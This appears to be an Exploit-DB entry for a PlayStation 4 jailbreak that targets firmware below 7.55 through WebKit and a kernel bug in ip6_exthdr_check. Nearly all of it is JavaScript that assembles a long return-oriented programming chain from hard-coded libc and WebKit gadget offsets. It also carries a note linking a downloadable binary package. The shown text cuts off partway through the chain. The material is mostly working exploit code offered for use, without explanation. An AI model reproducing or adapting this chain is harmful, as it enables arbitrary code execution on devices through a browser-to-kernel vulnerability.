sony playstation 4 (ps4) < 7.55 jailbreak webkit kernel loader sock_raw ip6_exthdr_check

				
// EDB-Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/49664.zip

var ropchain_array = new Uint32Array(337302);
var ropchain = read_ptr_at(addrof(ropchain_array)+0x10);
var ropchain_offset = 2;
function set_gadget(val)
{
    ropchain_array[ropchain_offset++] = val | 0;
    ropchain_array[ropchain_offset++] = (val / 4294967296) | 0;
}
function set_gadgets(l)
{
    for(var i = 0; i < l.length; i++)
        set_gadget(l[i]);
}
function db(data)
{
    for(var i = 0; i < data.length; i++)
        ropchain_array[ropchain_offset++] = data[i];
}
var main_ret = malloc(8);
var printf_buf = malloc(65536);
var __swbuf_addr = 0; // STUB
set_gadgets([
libc_base+763368, //pop rcx
ropchain+65720, //rdi_bak
libc_base+533450, //mov [rcx], rdi
libc_base+144605, //pop rdi
ropchain+65680, //stack_bottom
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
ropchain+112, //ret_addr
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+1221872, //_main
//ret_addr:
libc_base+782311, //pop rsp
ropchain+65680 //stack_bottom
]);
//_ps4_printf_buffer:
var printf_buf_offset = 128;
set_gadget(printf_buf);
//_ps4_printf_fd:
db([4294967295, 4294967295]); // -0x1
//stack:
ropchain_offset += 16384;
//stack_bottom:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
main_ret,
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//rdi_bak:
//_pivot_back_addr:
db([0, 0]); // 0x0
set_gadgets([
pivot_addr,
//___builtin_bswap16:
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+65800, //L1
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L1:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+65896, //L2
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+65928, //L5
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L2:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L5:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+66032, //L8
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+66016, //L6
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224144, //mov ax, [rdi]
libc_base+764760, //pop rsi
ropchain+66192, //L12
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+66160, //L10
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+66176, //L11
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9:
db([16, 0]); // 0x10
set_gadget(webkit_base+3236123,); //pop r9
//L10:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+66248, //L14
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L14:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+66376, //L16
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+66392, //L17
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+66360, //L15
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L15:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L16:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L17:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+66552, //L21
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+66520, //L19
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+66536, //L20
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L18:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L19:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L20:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L21:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+66656, //L23
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+66640, //L22
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L22:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L23:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L24:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L25:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+66864, //L28
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+66848, //L27
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L26:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L27:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L28:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+66968, //L30
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+66952, //L29
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L29:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L30:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+67048, //L31
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L31:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L33:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+67168, //L36
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+67152, //L34
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L34:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L36:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224144, //mov ax, [rdi]
libc_base+764760, //pop rsi
ropchain+67328, //L40
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+67296, //L38
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+67312, //L39
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L37:
db([16, 0]); // 0x10
set_gadget(webkit_base+3236123,); //pop r9
//L38:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L39:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L40:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+67384, //L42
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L42:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+67512, //L44
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+67528, //L45
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+67496, //L43
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L43:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L44:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L45:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+67688, //L49
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+67656, //L47
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+67672, //L48
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L46:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L47:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L48:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L49:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+67792, //L51
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+67776, //L50
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L50:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L51:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L52:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L53:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+67992, //L56
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+67976, //L55
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L54:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L55:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L56:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+68096, //L58
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+68080, //L57
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L57:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L58:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+68208, //L61
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+68192, //L60
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L59:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L60:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L61:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+68272, //L63
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+763368 //pop rcx
]);
//L63:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+68328, //L64
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L64:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+68480, //L67
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+68496, //L68
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+68464, //L66
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L66:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L67:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L68:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+68608, //L69
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+68640, //L71
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+68624, //L70
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L69:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L70:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L71:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+68744, //L72
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+68760, //L73
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L72:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L73:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+68880, //L74
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+68864, //L75
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L75:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L74:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+68968, //L77
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+68952, //L76
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L76:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L77:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+69072, //L78
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+69088, //L79
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L78:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L79:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+69208, //L80
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+69192, //L81
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L81:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L80:
db([0, 0]); // 0x0
//___builtin_bswap32:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+69280, //L83
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L83:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+69376, //L84
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+69408, //L87
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L84:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L86:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L87:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+69512, //L90
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+69496, //L88
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L88:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L90:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+69688, //L93
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+69704, //L94
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+69656, //L91
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+69672, //L92
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L91:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L92:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L93:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L94:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+69800, //L96
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+69784, //L95
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L95:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L96:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L97:
db([24, 0]); // 0x18
set_gadget(libc_base+763368,); //pop rcx
//L98:
db([24, 0]); // 0x18
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+70000, //L101
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+69984, //L100
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L99:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L100:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L101:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+70104, //L103
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+70088, //L102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L102:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L103:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848080, //shr rax, cl
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+70192, //L104
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L104:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L106:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+70312, //L109
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+70296, //L107
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L107:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L109:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+70488, //L112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+70504, //L113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+70456, //L110
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+70472, //L111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L110:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L111:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L112:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L113:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+70600, //L115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+70584, //L114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L114:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L115:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L117:
db([16711680, 0]); // 0xff0000
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+70712, //L118
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L118:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L120:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L121:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+70944, //L124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+70928, //L123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L122:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L123:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L124:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+71048, //L126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+71032, //L125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L125:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L126:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+71104, //L128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L128:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+71160, //L129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L129:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+71272, //L131
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L131:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L133:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+71392, //L136
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+71376, //L134
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L134:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L136:
db([0, 0]); // 0x0
set_gadgets([
